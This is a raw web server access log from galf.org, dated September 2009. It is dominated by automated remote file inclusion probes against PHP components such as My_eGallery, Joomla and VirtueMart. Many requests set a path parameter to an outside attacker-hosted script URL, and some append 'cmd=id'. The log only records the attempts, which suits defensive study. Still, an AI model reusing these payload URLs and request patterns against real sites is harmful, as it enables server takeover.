58.184.252.3 - - [21/Sep/2009:12:11:38 -0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
217.173.25.215 - - [21/Sep/2009:12:11:50 -0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.173.25.215 - - [21/Sep/2009:12:11:50 -0700] "GET /logs/access_090420.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.173.25.215 - - [21/Sep/2009:12:11:50 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.173.25.215 - - [21/Sep/2009:12:12:00 -0700] "GET /logs/access_090420.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
79.174.78.83 - - [21/Sep/2009:12:12:54 -0700] "GET /logs/access.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://rox-crime2.no-ip.org:8080/scan/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
79.174.78.83 - - [21/Sep/2009:12:12:54 -0700] "GET /logs/access_090302.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://rox-crime2.no-ip.org:8080/scan/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.55.207.100 - - [21/Sep/2009:12:13:48 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
121.125.74.87 - - [21/Sep/2009:12:14:05 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.125.74.87 - - [21/Sep/2009:12:14:06 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.125.74.87 - - [21/Sep/2009:12:14:08 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
65.55.51.112 - - [21/Sep/2009:12:14:15 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
121.125.74.87 - - [21/Sep/2009:12:14:16 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.125.74.87 - - [21/Sep/2009:12:14:16 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.125.74.87 - - [21/Sep/2009:12:14:16 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.125.74.87 - - [21/Sep/2009:12:14:21 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.125.74.87 - - [21/Sep/2009:12:14:21 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.125.74.87 - - [21/Sep/2009:12:14:21 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://randycute.com/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "galf.org"
121.125.74.87 - - [21/Sep/2009:12:14:32 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.125.74.87 - - [21/Sep/2009:12:14:32 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.125.74.87 - - [21/Sep/2009:12:14:32 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
65.55.207.100 - - [21/Sep/2009:12:15:16 -0700] "GET /?M=A HTTP/1.1" 200 1048 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
64.6.107.34 - - [21/Sep/2009:12:15:50 -0700] "GET /logs/access_090420.log/index.php?contenido=http://www.freewebtown.com/ppkkssss/arroz/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.6.107.34 - - [21/Sep/2009:12:15:50 -0700] "GET /logs/index.php?contenido=http://www.freewebtown.com/ppkkssss/arroz/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.6.107.34 - - [21/Sep/2009:12:15:50 -0700] "GET /index.php?contenido=http://www.freewebtown.com/ppkkssss/arroz/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.17.99.13 - - [21/Sep/2009:12:16:10 -0700] "GET /logs/access_090713.log%20%20/?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.17.99.13 - - [21/Sep/2009:12:16:10 -0700] "GET /logs/access_090406.log%20%20/?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.17.99.13 - - [21/Sep/2009:12:16:10 -0700] "GET /?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
216.17.99.13 - - [21/Sep/2009:12:16:15 -0700] "GET /logs/access_090622.log%20%20/?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.17.99.13 - - [21/Sep/2009:12:16:17 -0700] "GET /logs/?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
216.17.99.13 - - [21/Sep/2009:12:16:18 -0700] "GET /logs/access_090420.log%20%20/?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.17.99.13 - - [21/Sep/2009:12:16:18 -0700] "GET /logs/access_090504.log%20%20/?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.17.99.13 - - [21/Sep/2009:12:16:18 -0700] "GET /logs/access_090302.log%20%20/?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.17.99.13 - - [21/Sep/2009:12:16:20 -0700] "GET /logs/access_090316.log%20%20/?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.231.187.33 - - [21/Sep/2009:12:16:21 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
193.231.187.33 - - [21/Sep/2009:12:16:21 -0700] "GET /logs/access_090309.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
193.231.187.33 - - [21/Sep/2009:12:16:21 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
216.17.99.13 - - [21/Sep/2009:12:16:22 -0700] "GET /logs/access_090622.log%20%20/?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.17.99.13 - - [21/Sep/2009:12:16:22 -0700] "GET /logs/access_090629.log%20%20/?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.17.99.13 - - [21/Sep/2009:12:16:22 -0700] "GET /logs/access.log%20%20/?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.17.99.13 - - [21/Sep/2009:12:16:22 -0700] "GET /logs/access_090615.log%20%20/?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.6.107.34 - - [21/Sep/2009:12:16:41 -0700] "GET /index.php?contenido=http://www.freewebtown.com/ppkkssss/arroz/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.6.107.34 - - [21/Sep/2009:12:16:41 -0700] "GET /logs/index.php?contenido=http://www.freewebtown.com/ppkkssss/arroz/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.6.107.34 - - [21/Sep/2009:12:16:41 -0700] "GET /logs/access_090420.log/index.php?contenido=http://www.freewebtown.com/ppkkssss/arroz/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [21/Sep/2009:12:17:38 -0700] "GET /logs/access.log%20%20//viewbody.html?code=http://singingcamel.com/defacer/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.231.187.33 - - [21/Sep/2009:12:17:40 -0700] "GET /logs/access_090316.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
58.184.252.3 - - [21/Sep/2009:12:17:42 -0700] "GET /logs/access_090420.log%20%20/?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [21/Sep/2009:12:17:43 -0700] "GET /logs/access_090316.log%20%20/?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [21/Sep/2009:12:17:43 -0700] "GET /logs/access_090302.log%20%20/?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [21/Sep/2009:12:17:43 -0700] "GET /logs/access_090713.log%20%20/?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [21/Sep/2009:12:17:46 -0700] "GET /logs/?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [21/Sep/2009:12:17:54 -0700] "GET /logs/access_090824.log%20%20//viewbody.html?code=http://singingcamel.com/defacer/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [21/Sep/2009:12:18:06 -0700] "GET /logs/access_090622.log%20%20/?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [21/Sep/2009:12:18:06 -0700] "GET /logs/access_090629.log%20%20/?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [21/Sep/2009:12:18:08 -0700] "GET /logs/access_090615.log%20%20/?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [21/Sep/2009:12:18:11 -0700] "GET /logs/access.log%20%20/?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.173.25.215 - - [21/Sep/2009:12:18:43 -0700] "GET /logs/access_090420.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.220.59 - - [21/Sep/2009:12:18:56 -0700] "GET /logs/access.log%20%20//include.php?path[docroot]=http://ipts.co.kr/bbs/upload/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.228.220.59 - - [21/Sep/2009:12:18:56 -0700] "GET /logs//include.php?path[docroot]=http://ipts.co.kr/bbs/upload/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.228.220.59 - - [21/Sep/2009:12:18:56 -0700] "GET /include.php?path[docroot]=http://ipts.co.kr/bbs/upload/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
217.173.25.215 - - [21/Sep/2009:12:19:00 -0700] "GET /logs/access_090420.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [21/Sep/2009:12:19:25 -0700] "GET /logs/access_090406.log%20%20/?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [21/Sep/2009:12:19:25 -0700] "GET /logs/access_090302.log%20%20/?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [21/Sep/2009:12:19:25 -0700] "GET /logs/access_090713.log%20%20/?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [21/Sep/2009:12:19:25 -0700] "GET /logs/access_090316.log%20%20/?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [21/Sep/2009:12:19:25 -0700] "GET /logs/access.log%20%20/?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [21/Sep/2009:12:19:25 -0700] "GET /logs/access_090622.log%20%20/?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [21/Sep/2009:12:19:25 -0700] "GET /logs/?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [21/Sep/2009:12:19:28 -0700] "GET /logs/access_090420.log%20%20/?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [21/Sep/2009:12:19:28 -0700] "GET /logs/access_090629.log%20%20/?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.231.187.33 - - [21/Sep/2009:12:19:41 -0700] "GET /logs/access_090309.log%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
121.125.74.87 - - [21/Sep/2009:12:19:43 -0700] "GET /logs/access.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.125.74.87 - - [21/Sep/2009:12:19:45 -0700] "GET /logs/access.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.125.74.87 - - [21/Sep/2009:12:19:48 -0700] "GET /logs/access.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.125.74.87 - - [21/Sep/2009:12:19:49 -0700] "GET /logs/access.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://randycute.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
64.6.107.34 - - [21/Sep/2009:12:22:26 -0700] "GET /logs/access.log/index.php?contenido=http://www.freewebtown.com/ppkkssss/arroz/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.6.107.34 - - [21/Sep/2009:12:22:44 -0700] "GET /logs/access.log/index.php?contenido=http://www.freewebtown.com/ppkkssss/arroz/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.55.209.191 - - [21/Sep/2009:12:24:19 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.209.191 - - [21/Sep/2009:12:24:19 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.209.191 - - [21/Sep/2009:12:24:22 -0700] "GET /cendoc/?S=A HTTP/1.1" 200 526 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
67.228.220.59 - - [21/Sep/2009:12:25:18 -0700] "GET /logs/access.log//include.php?path[docroot]=http://ipts.co.kr/bbs/upload/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
78.172.38.110 - - [21/Sep/2009:12:25:18 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://bluepadma.com/t.dat?&list=1&cmd=id HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" "www.galf.org"
208.43.194.3 - - [21/Sep/2009:12:25:20 -0700] "GET /logs/access_090511.log%20//addevent.inc.php?agendax_path=http://soxs.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
208.43.194.3 - - [21/Sep/2009:12:25:20 -0700] "GET /addevent.inc.php?agendax_path=http://soxs.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
208.43.194.3 - - [21/Sep/2009:12:25:20 -0700] "GET /logs//addevent.inc.php?agendax_path=http://soxs.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
213.165.83.144 - - [21/Sep/2009:12:26:33 -0700] "GET /logs/modules/My_eGallery/public/displayMedia.php?basepath=http://leoboy1.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
213.165.83.144 - - [21/Sep/2009:12:26:33 -0700] "GET /logs/access.log/modules/My_eGallery/public/displayMedia.php?basepath=http://leoboy1.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
213.165.83.144 - - [21/Sep/2009:12:26:33 -0700] "GET /modules/My_eGallery/public/displayMedia.php?basepath=http://leoboy1.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
58.184.252.3 - - [21/Sep/2009:12:28:19 -0700] "GET /logs/access_090420.log/?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [21/Sep/2009:12:29:44 -0700] "GET /logs/access_090420.log/?basepath=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
221.143.40.39 - - [21/Sep/2009:12:29:46 -0700] "GET /logs/access.log/////?_SERVER%5BDOCUMENT_ROOT%5D=http://cyb3r0s.fileave.com/fx29id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "galf.org"
67.225.196.53 - - [21/Sep/2009:12:30:38 -0700] "GET /logs/modules/My_eGallery/public/displayTop.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.225.196.53 - - [21/Sep/2009:12:30:38 -0700] "GET /modules/My_eGallery/public/displayTop.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.225.196.53 - - [21/Sep/2009:12:30:38 -0700] "GET /logs/access.log/modules/My_eGallery/public/displayTop.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "galf.org"
67.225.196.53 - - [21/Sep/2009:12:30:38 -0700] "GET /logs/modules/My_eGallery/public/displayTop.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.225.196.53 - - [21/Sep/2009:12:30:38 -0700] "GET /logs/access.log%20%20/modules/My_eGallery/public/displayTop.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.225.196.53 - - [21/Sep/2009:12:30:38 -0700] "GET /modules/My_eGallery/public/displayTop.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.225.196.53 - - [21/Sep/2009:12:30:41 -0700] "GET /modules/My_eGallery/public/displayTop.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.225.196.53 - - [21/Sep/2009:12:30:41 -0700] "GET /logs/modules/My_eGallery/public/displayTop.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.225.196.53 - - [21/Sep/2009:12:30:41 -0700] "GET /logs/access.log/modules/My_eGallery/public/displayTop.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.225.196.53 - - [21/Sep/2009:12:31:01 -0700] "GET /logs/access.log%20%20/modules/My_eGallery/public/displayTop.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.225.196.53 - - [21/Sep/2009:12:31:01 -0700] "GET /logs/modules/My_eGallery/public/displayTop.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.225.196.53 - - [21/Sep/2009:12:31:01 -0700] "GET /modules/My_eGallery/public/displayTop.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.225.196.53 - - [21/Sep/2009:12:32:19 -0700] "GET /logs/modules/My_eGallery/public/displayTop.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.225.196.53 - - [21/Sep/2009:12:32:19 -0700] "GET /modules/My_eGallery/public/displayTop.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.225.196.53 - - [21/Sep/2009:12:32:19 -0700] "GET /logs/access.log/modules/My_eGallery/public/displayTop.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.225.196.53 - - [21/Sep/2009:12:32:28 -0700] "GET /logs/modules/My_eGallery/public/displayTop.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.225.196.53 - - [21/Sep/2009:12:32:28 -0700] "GET /modules/My_eGallery/public/displayTop.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.225.196.53 - - [21/Sep/2009:12:32:28 -0700] "GET /logs/access.log/modules/My_eGallery/public/displayTop.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
210.114.220.160 - - [21/Sep/2009:12:32:29 -0700] "GET /logs/access.log%20%20//include.php?path[docroot]=http://shulamusic.com/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
210.114.220.160 - - [21/Sep/2009:12:32:29 -0700] "GET /logs//include.php?path[docroot]=http://shulamusic.com/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
210.114.220.160 - - [21/Sep/2009:12:32:29 -0700] "GET /include.php?path[docroot]=http://shulamusic.com/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
210.114.220.160 - - [21/Sep/2009:12:32:31 -0700] "GET /logs/access.log%20%20//include.php?path[docroot]=http://shulamusic.com/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
210.114.220.160 - - [21/Sep/2009:12:32:31 -0700] "GET /include.php?path[docroot]=http://shulamusic.com/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
210.114.220.160 - - [21/Sep/2009:12:32:31 -0700] "GET /logs//include.php?path[docroot]=http://shulamusic.com/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.225.196.53 - - [21/Sep/2009:12:32:32 -0700] "GET /logs/modules/My_eGallery/public/displayTop.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.225.196.53 - - [21/Sep/2009:12:32:32 -0700] "GET /modules/My_eGallery/public/displayTop.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.225.196.53 - - [21/Sep/2009:12:32:32 -0700] "GET /logs/access.log/modules/My_eGallery/public/displayTop.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.225.196.53 - - [21/Sep/2009:12:32:35 -0700] "GET /logs/modules/My_eGallery/public/displayTop.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.225.196.53 - - [21/Sep/2009:12:32:35 -0700] "GET /logs/access.log/modules/My_eGallery/public/displayTop.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.225.196.53 - - [21/Sep/2009:12:32:35 -0700] "GET /modules/My_eGallery/public/displayTop.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.225.196.53 - - [21/Sep/2009:12:32:38 -0700] "GET /modules/My_eGallery/public/displayTop.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.225.196.53 - - [21/Sep/2009:12:32:38 -0700] "GET /logs/modules/My_eGallery/public/displayTop.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.225.196.53 - - [21/Sep/2009:12:32:38 -0700] "GET /logs/access_090420.log%20%20/modules/My_eGallery/public/displayTop.php?basepath=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
